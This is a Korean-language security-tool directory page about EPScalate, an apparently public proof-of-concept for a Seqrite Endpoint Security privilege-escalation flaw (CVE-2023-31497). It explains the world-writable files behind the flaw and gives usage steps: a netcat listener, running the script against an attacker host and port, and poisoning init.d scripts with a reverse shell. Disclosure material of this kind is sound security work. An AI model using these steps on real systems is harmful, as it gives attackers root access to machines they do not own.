Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
EPScalate — QuickHeal의 Seqrite EPS에서 권한 상승 취약점(CVE-2023-31497)을 악용하는 익스플로잇입니다. | Kitploit
도구/GitHubGitHub/0xinfection/epscalate
Privilege EscalationVulnerability AnalysisExploitationPost-ExploitationPenetration Testing
GitHub0xinfection/epscalate

EPScalate

QuickHeal의 Seqrite EPS에서 권한 상승 취약점(CVE-2023-31497)을 악용하는 익스플로잇입니다.

저장소 보기
1922년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

EPScalate

QuickHeal의 Seqrite Enterprise Endpoint Security Solution (EPS)에서 발생하는 권한 상승 취약점입니다. 이 취약점에는 CVE-2023-31497 CVE ID가 할당되었습니다.

https://user-images.githubusercontent.com/39941993/230790056-87157751-b96c-49a6-81df-bf3126acfbd6.mp4

공급업체 및 제품 세부 정보

  • 공급업체: Quick Heal Technologies Limited
  • 제품: Seqrite Endpoint Security (EPS)
  • 제품 홈페이지: https://www.seqrite.com/endpoint-security/seqrite-endpoint-security
  • 영향을 받는 버전: v8.0 이전의 모든 버전에 영향을 미칩니다.

취약점 세부 정보

Seqrite Endpoint Security는 기본 설치 시 /usr/lib/Seqrite/ 디렉터리에 매우 취약한 디렉터리 및 파일 권한으로 설치되어 로컬 사용자에게 디렉터리 내용에 대한 전체 읽기/쓰기 권한을 부여합니다. 또한 설치 절차는 시작 스크립트를 /etc/init.d/에 설치하는데, 이 스크립트들은 모든 사용자가 쓸 수 있습니다. 이로 인해 시스템의 모든 저권한 사용자가 권한을 상승시켜 root가 될 수 있습니다.

이 익스플로잇은 소프트웨어에 의해 도입된 2가지 서로 다른 취약점을 이용하여 시스템에서 권한을 상승시킵니다. 첫째, 애플리케이션이 /etc/init.d/의 스크립트를 사용하여 스캔 프로세스를 시작하는데, 이 스크립트는 모든 사용자가 쓸 수 있습니다. 둘째, 애플리케이션은 런타임 중에 위치 독립 코드(PIC)를 동적으로 로드하기 위해 공유 객체를 사용합니다. 실제로 실행 가능한 모든 공유 객체 파일은 모든 사용자가 쓸 수 있습니다. 마지막으로, 데몬 프로세스에 사용되는 애플리케이션 바이너리도 모든 사용자가 쓸 수 있으므로, 권한이 없는 사용자가 스캐너 바이너리를 리버스 셸 바이너리로 덮어써서 root로 임의 코드를 실행할 수 있습니다.

익스플로잇 사용법

익스플로잇은 취약점 악용을 돕는 간단한 Python 파일입니다.

단계:

  1. 공격자 머신에서 netcat (nc -lvp <port>) 또는 metasploit (multi/handler)을 사용하여 리스너를 시작합니다.
  2. 대상 시스템에 epscalate.py 및 shellcode.c 파일을 복사/다운로드합니다.
  3. 적절한 인수와 함께 Python 파일을 실행합니다 (python3 epscalate.py -H 192.168.0.103:9999 -I).
  4. AV가 다시 로드되거나 시스템이 재부팅될 때까지 기다립니다.
  5. 리스너로의 역방향 연결을 통해 root로 코드 실행이 확인됩니다.

익스플로잇 도움말:

root@kitploit:~
$ python epscalate.py -h

    EPSCALATE - PoC for privesc in Seqrite EPS
                ~ 0xInfection

usage: epscalate.py -H <host>:<port> <technique_flag>

options:
  -h, --help            show this help message and exit
  -H HOSTPORT, --hostport HOSTPORT
                        The IP and port of the listening attacker machine in format of <ip>:<port>
  -B, --daemon-binaries
                        Overwrite the main daemon binaries to escalate privileges.
  -I, --initd-scripts   Posion /etc/init.d/ bash startup scripts with a reverse shell to escalate privileges.

지원

익스플로잇은 모든 Debian 및 Ubuntu 기반 변형 운영 체제에서 테스트되었습니다.

라이선스 및 크레딧

익스플로잇 코드는 Apache 2.0 라이선스로 게시되었습니다. 취약점은 공급업체에 공개되었으며, 취약점 게시 시점에 이미 수정되었습니다.

취약점 및 익스플로잇 크레딧: Pinaki Mondal (0xInfection).

도구 다운로드